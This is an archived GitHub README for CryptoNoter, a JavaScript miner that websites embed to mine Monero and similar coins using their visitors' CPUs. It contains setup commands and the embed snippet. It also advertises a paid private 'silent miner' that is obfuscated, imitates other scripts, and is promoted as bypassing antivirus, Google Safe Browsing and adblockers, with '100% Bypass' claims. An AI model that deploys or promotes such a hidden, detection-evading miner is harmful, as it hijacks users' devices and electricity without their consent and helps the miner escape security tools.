
Archive April 102018 with CryptoNoter In-Browser Javascript Web Miner for Monero (XMR), Electroneum (ETN), Sumokoin (SUMO) & ByteCoin (BCN) https://www.cryptonoter.com

Primary LanguageJavaScriptMIT LicenseMIT

CryptoNoter In-Browser Javascript Web Miner

Payment To Personal Wallet "Plug & Play" Installation Set Up Within 10 Mins

CryptoNoter In-Browser Javascript Web Miner For Websites / Support XMR, ETN, SUMO & BCN Coins
Built for in-browser javascript mining on any Monero (XMR), Electroneum (ETN), Sumokoin (SUMO) & ByteCoin (BCN) pools. 0% Commission. Payout Towards Personal Wallet. THE ONLY In-Browser Web Miner That Supports Multi Cryptocurrency.

  • You can set up CryptoNoter wthin 10 minutes if you have basic knowledge of server set-up. If you are a newbie, you might need to take some time to set up CryptoNoter


21/02/18 - Google, Firefox, Anti-Virus and Adblockers have started cracking down on websites that uses wasm-enabled web miners which generally represent almost all of the publicly available web mining platforms. The new version of my private miner is built on a lighter and faster hashing algorithm that does not rely on .wasm (WebAssembly) and are not flagged. For more info, please refer to https://github.com/cryptonoter/CryptoNoter/issues/34

18/01/18 - I am no longer supporting developments of this version of public miner on Github. WebAssembly based mining is facing massive crackdown by AVs and Google. Instead, i am focusing on the private version to stay clear of radar. For users who are still using or intending to use my public miner on this Github, please use it at your own risk.

11/01/18 - I am working on a miner that non-tech users can embed on their websites and start mining in mins. So stay tuned. I will try to keep the interface as clean as possible. No login, no registration. Simply enter wallet address, copy/paste codes and mine.

01/01/18 - Due to the popularity of this github public repository project, many users have reported that anti-virus scanners and adblockers are flagging the miner as virus and malware. I have already developed a slient miner on my private repository that bypass av scanners and adblockers. I will not be updating this public repository with the new bypass techniques because by exposing the new coding, AV and adblockers will flag it again. If you are interested in the private miner, please read more informaton at the bottom of this page.

25/12/16 - Added Javascript API Documentation of CryptoNoter. Refer to https://github.com/cryptonoter/CryptoNoter/wiki/Javascript-API-Documentation-For-CryptoNoter

24/12/16 - I am building a network of javascript web miners with my private repository. Interested parties, please read here: https://www.facebook.com/notes/cryptonotercom/attention-on-new-proposed-model-for-custom-miner/1907073142881350/

19/12/17 - Project has been modified and updated. CryptoNoter now supports mining for ByteCoin (BCN), Monero (XMR) and Electroneum (ETN) coins. This is a huge step forward for this project and i aim to support majority of the cryptonote currencies in future. Please consider a donation for my developments. You donation will support this project greatly. To update your miner, go to /srv/CryptoNoter and run git pull.

18/12/17 - CryptoNoter now supports mining for both Monero (XMR) and Electroneum (ETN) coins.

Support Other Alternate Cryptocurrency? Discuss Here: https://github.com/cryptonoter/CryptoNoter/issues/14

Why This Project Is Created

  • I hope that this project can act as a foundation for further developments into useful services. For example, it can be modified as a journalism gatekeeping mechanism or modified to help specific groups like graphic designers whom are offering their designs as royalty free or game developer offering background mining as a form of reward credit points to purchase in-game features. Let's think out of the box.

  • Please do not abuse this project. It shouldn't be used without the user's consent or used for darkweb services. And i really do not wish to see my project being abused in illegal activities.

  • If you would like to support this project and my ongoing developments, please consider making a donation using my wallet or PayPal address at the bottom of this page. Thank you very much

  • Follow me at CryptoNoter Facebook Page: https://www.facebook.com/cryptonoter/ for regular updates on future developments.

Facebook Page: https://www.facebook.com/cryptonoter
Follow My Twitter: https://twitter.com/cryptonoter
CryptoNoter Demo: https://www.cryptonoter.me/demo.php
XMR Mining Pool (For Javascript Web Mining): https://pool.cryptonoter.com


The project is basically a "Plug & Play" installation. Most of the configurations are setup automatically when you run the installation. Simply follow the step by step installation.

However, if you decide to modify or optimize CryptoNoter for maximum mining capabilities, you will need good knowledge on Nginx Reverse Proxy, javascript, etc. For example, I did approx 1550 H/s for a website with approx 15,000 daily visitors (Avg Time on Page: 55 secs / visitor) before optimization. After optimization, I did on avg 3500 H/s. After the latest update (18/12/17), I am doing 4300 H/s

Minimum System Requirements

  1. Server with at least 1 CPU, 1 GB Ram & 8GB Harddisk [You will need better specs if you have higher traffic load]
  2. Ubuntu(Debian) OS
  3. Nginx, Nodejs, NPM & Forever Packages
  4. SSL Support For Domain. Use https://certbot.eff.org/
  • If you do not have an ideal choice of server host, you can use this link https://m.do.co/c/172e382f89a8 to sign up at DigitalOcean and get free $10 credit to start your test development. $10 credit should provide you a server with the minimum requirements and last for 2 months.

IMPORTANT NOTE: DO NOT USE GOOGLE COMPUTE ENGINE (GCE) or other related Google Cloud Services for crypto-mining services. It is in violation of their TOS. Google will suspend your account, lock your files and charge you for the usage. Been there, done that. So don't waste your precious time.

GitHub Installation

Install CryptoNoter

curl https://raw.githubusercontent.com/cryptonoter/CryptoNoter/master/install.sh > install.sh
sudo sh install.sh

During the installation process, you are REQUIRED to specify your Monero Wallet Address. If you do not specify your wallet address, the installer will prompt you for it before proceeding with installation.

  • Copy config.EXAMPLE.json to config.json
    I have force install.sh to prompt for your wallet address before proceeding with installation, however there are still concerns. This step is added to address the concerns that users might somehow still mine using my wallet address. I have also blank out my wallet address. Please use the following command to copy to config.json and then edit the config.json setting manually.
cd /srv/CryptoNoter
cp config.EXAMPLE.json config.json
  • Install Control Panel (Vesta CP or Cpanel or DirectAdmin, etc)
  • Set Up Your Domain DNS Properly & Configure Firewalls
  • Use CertBot To Assign SSL For Your Domain
  • Login Via FTP and Upload The Files Within The web Folder To Your Domain root public_html

Docker Installation

You can run CryptoNoter within a docker container. See https://hub.docker.com/r/cbarraford/cryptonoter-docker/ for more info.

NOTE: The docker image is manually built, and therefore may not be running the lastest version of CryptoNoter code.

docker pull cbarraford/cryptonoter-docker

Configuration w/ Environment Variables

It is possible to configure CryptoNoter with environment variables alone. This is helpful in some cases like docker and heroku. * DOMAIN - domain of your server * PORT - port your server should run on * POOL - the mining pool to join (ie pool.cryptonoter.com:1111) * ADDR - Your wallet address * PASS - Your password * KEY - ssl key filepath * CERT - ssl cert filepath


This is a Nginx Reverse Proxy server setup, YOU NEED TO ADD THE FOLLOWING TO YOUR NGINX.CONF file under the domain. Without the following configuration, it will not work.

   location /proxy {  
  	add_header 'Access-Control-Allow-Origin' * always;
  	proxy_pass http://localhost:7777;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";


  • Run CryptoNoter server.js script
forever start /srv/CryptoNoter/server.js
  • Make sure CryptoNoter server.js script is running on the server by using the command forever list
info:    Forever processes running
data:        uid  command       script                     forever pid  id logfile                 uptime
data:    [0] tX4L /usr/bin/node /srv/CryptoNoter/server.js 7379    7385    /root/.forever/tX4L.log 0:0:59:11.96
  • Make sure you have uploaded the web folder to your domain public_html or domain root. Ensure you can access https://YOUR_DOMAIN_NAME/demo.html

  • Change the settings for these files: worker.js, processor.js & lib/cryptonight-asmjs.min.js
    Replace %CryptoNoter_domain% with your DOMAIN_NAME in the 3 files. Including the following codes:

self.CryptoNoter = self.CryptoNoter || {};
self.CryptoNoter.CONFIG = {
    LIB_URL: "https://%CryptoNoter_domain%/lib/",
    WEBSOCKET_SHARDS: [["wss://%CryptoNoter_domain%/proxy"]],
    CAPTCHA_URL: "https://%CryptoNoter_domain%/captcha/",
    MINER_URL: "https://%CryptoNoter_domain%/media/miner.html"
  • Add the following javascript before the </head> tag onto webpages that you want the miner to run on. Remember to replace www.cryptonoter.com with your domain name. Else, you will be mining for my wallet
<script src="https://www.cryptonoter.com/processor.js"></script>
    var miner = new CryptoNoter.User('CryptoNoter').start();
  • Done! You can now start mining using your visitors' CPU resources by adding the above tag to any of your websites. Have a look at CryptoNoter Demo: https://www.cryptonoter.me/demo.php

JS Miner API Documentation

There are parameters that you can preset within the javscript miner script. Read the Full API Documentation, please refer to https://github.com/cryptonoter/CryptoNoter/wiki/Javascript-API-Documentation-For-CryptoNoter

*autothreads(value) The number of threads the miner should start with. Set to true is to auto detect the number of CPU cores available on the user's computer.

*throttle(value) Set the fraction of time that threads should be idle. A value of 0 means no throttling (i.e. full speed), a value of 0.5 means that threads will stay idle 50% of the time, with 0.8 they will stay idle 80% of the time.

Here are some basic configuration for the parameters:

<script src="https://www.cryptonoter.com/processor.js"></script>
	var addr = 'CryptoNoter';
	var miner = new CryptoNoter.User(addr, {
        autoThreads: true,
	throttle: 0.8


Check if server.js execute successfully by using this command

node /srv/CryptoNoter/server.js

If script executes successfully, it should show:

In-Browser Javascript XMR miner for websites / Payout towards personal XMR wallet
Built for in-browser javascript mining on any Monero pools. 0% Commission. 100% Payout

 Listen on :
 Pool Host : pool.cryptonoter.com:1111

If script executes unsucessfully, it should show error logs. Troubleshoot by referring to the errors shown. For example: The error log shown below means that the port 7777 is currently in use. To resolve: Simply listen to the port 7777, identify the process that is using the port and kill the process. Then try executing the script server.js again

Error: listen EADDRINUSE
    at Object._errnoException (util.js:1024:11)
    at _exceptionWithHostPort (util.js:1046:20)
    at Server.setupListenHandle [as _listen2] (net.js:1351:14)
    at listenInCluster (net.js:1392:12)
    at doListen (net.js:1501:7)
    at _combinedTickCallback (internal/process/next_tick.js:141:11)
    at process._tickCallback (internal/process/next_tick.js:180:9)
    at Function.Module.runMain (module.js:678:11)
    at startup (bootstrap_node.js:187:16)
    at bootstrap_node.js:608:3

Common Issues & Bugs:

  1. Port in use. Check if the port is listening?
  2. Connection errors are commonly casused by iptables. Check your firewall settings
  3. CryptoNoter not generating hashes. Check your config.json setting
  4. Check the setting of nginx.conf, config.json, worker.js, processor.js & cryptonight-asmjs.min.js
  5. Very Common Issue: Please remember to change the domain url at demo.html to point to your own domain:
<script src="https://%CHANGE TO YOUR DOMAIN%/processor.js"></script>

For issues related to Proxy and Access Control Allow Origin, please read here: https://github.com/cryptonoter/CryptoNoter/issues/18

For troubleshooting & debugging, you should open the issues at https://github.com/cryptonoter/CryptoNoter/issues so that the community can replicate the bugs and help you out. I will be reading the issues frequently and will assist in troubleshooting.

Future Developments

At this moment, I'm working to implement Sumokoin & Intense Coin support into this project

Mining Pool

Monero XMR Mining Pool (For Javascript Web Mining): https://pool.cryptonoter.com

  • I am hosting a mining pool that i have modified to support javascript web mining. Use pool.cryptonoter.com:1111

Modified to suit the capabilities of low end devices. Var diff with mechanism to prevent high-end hardware from using low end port. Low end device enjoy low difficulty with 90% valid shares while high end hardware mine at best possible hashes.

In a low difficulty pool, miners submit shares more often and hence results in higher bandwidth costs. It will be costly for me to maintain a low difficulty pool, i would really appreciate a small donation to support this project.

Project has been modified and updated. CryptoNoter now supports mining on Monero (XMR), Electroneum (ETN), Sumokoin (SUMO) & ByteCoin (BCN) pools. To mine on ETN or BCN pools, simply change it to your ETN or BCN wallet address and point it to a Electroneum or ByteCoin mining pool. Likewise for other cryptonote coin support. Function is built into the project. No additional setting required.

Please consider making a donation using my wallet address at the bottom of this page. Thank you very much


Many users have feedback that they do not wish to use other web mining services due to shares skimming, malware and virus notifications towards users. Instead, they've proposed a profit sharing model for my installation, configuration and optimization of a private miner.

I have developed a silent miner on my private repository that bypass Google Safe Browsing, Anti-Virus and AdBlockers. I will continue to keep the private miner updated against malware and virus flags. In addition. The new version of my private miner is built on a lighter and faster hashing algorithm that does not reply on .wasm (WebAssembly). It is the main difference between my solution and all other mining platforms which use a common .wasm file.

The coding of my private miner will not be shared publicly. This model is only meant for high volume traffic websites or apps. If you are having low volume in terms of traffic, please use my public repository on GitHub.

VERY IMPORTANT DETAILS Google and Firefox will start flagging wasm files ultizing user CPU as malware via it's browsers. As of last week, AVs has already started flagging miners with wasm algorithm and Google Safe Browsing is tagging websites with wasm-enabled miners as malicious sites using red screen.

This is mainly due to the rise in web mining platforms using .wasm to access visitors' computing power and malwares using coinhive wasm as a mean to hijack users' devices. I have very reliable information that starting March, Google will work with AVs to put an end to wasm-enabled miners.

At the moment, every web mining platforms uses a WebAssembly porting of the CryptoNight algorithm in order to mine Monero and this has started a global rise on web mining activities. Websites with wasm-enabled mining has been flagged by Eset AV, which now works with Google Safe Browsing to flag sites as malicious. Over the past week, we have seen many websites using major web miners getting flagged with the RED SCREEN showing up as malicious site.

I have successfully rewrote a new mining algorithm that no longer rely on wasm (webassembly). Instead, the new algorithm is written in pure javascript and optimized for browser mining. Fully obfuscated, with it's hashing algorithm hidden from debugger. Interestingly, our tests have shown similar level of hash rate compared to .wasm-based hashing.

  • New Proposed Model For Custom Javascript Web Miner:
  1. User personal wallet address will be hardcoded into the miner.
  2. Usage of my private repo for the miner which is better and faster than the public repo on Github
  3. Custom Web Assembly and scripts that imitates other functions while running as a miner
  4. I will take care of the server monitoring, optimization and future miner updates
  • Pricing / Profit Sharing Structure Choose one of the following: Upfront Fees + 10% Profit Sharing (OR) No Upfront Fees + 20% Profit Sharing

  • Benefits:

  1. Payment to your personal wallet
  2. Deploying my private repository of the web miner
  3. Not using .wasm (WebAssembly) hashing method
  4. No more virus / malware / malicious code notifications to your visitors
  5. No more shares skimming or losing your hashes to js web mining services
  6. Check live statistics of your miner directly on a real mining pool, not from some backend SQL database
  • Conditions for this model:
  1. Profit sharing based on the agreed pricing structure
  2. Miner must be pointed to my mining pool
  3. Server cost for hosting the miner will be paid by user
  4. No access to the server or my private repository of the miner
  5. Only accept high traffic volume websites

Setup will take approx 30 mins and you may start mining with the private miner within minutes. Queue is based on first come first serve basis. If queues are long, you will have to wait for me. If you are interested, email me at cryptonoter@gmail.com

AV Scan Results For New Version (100% Bypass)

Donations To Support

  • There is NO DEVELOPER FEE hardcoded into this project. Donation is as per your goodwill to support my development. I am looking to add other cryptonote currencies support into this project and also to create a monero pool specifically for javascript browser mining. If you are interested in my future developments, i would really appreciate a small donation to support this project.
My Monero Wallet Address (XMR)
My Bitcoin Wallet Address (BTC)
My Litecoin Wallet Address (LTC)
  • PayPal Donation
    And if you prefer the traditional mode, you may donate to this project via PayPal by sending the donation to my PayPal email: cryptonoter@gmail.com

Last but not least, i am looking forward to hearing all of the great projects built upon this web miner project. If you've built something great, drop me an email so that i can share with my readers, users and friends.

Credits For Donations

Please email me at cryptonoter@gmail.com after making a donation so that i can add your names under Credits. This project requires continuous funding so please help if you can. Here are the individuals whom have supported with donations towards this project:

@adnaydenov @cryptodarkload @moshisatis @jasnsye @kimkingmos @firewallguards @techmoslsur @minnygurys and other anonymous users whom choose to remain anonymous!

Credits For Support & Troubleshooting

Thanks to @CBarraford for adding Docker support
Thanks to @tamerzg for identifying bugs on my updates and helping other users on troubleshooting


  • Note: If you are implementing this project in your personal or commercial projects, please be a nice and supportive user. You may give a credit back to my project or alternatively if you wish to keep credits hidden, please kindly consider a donation to keep this project running.

MIT https://raw.github.com/cryptonoter/CryptoNoter/master/LICENSE


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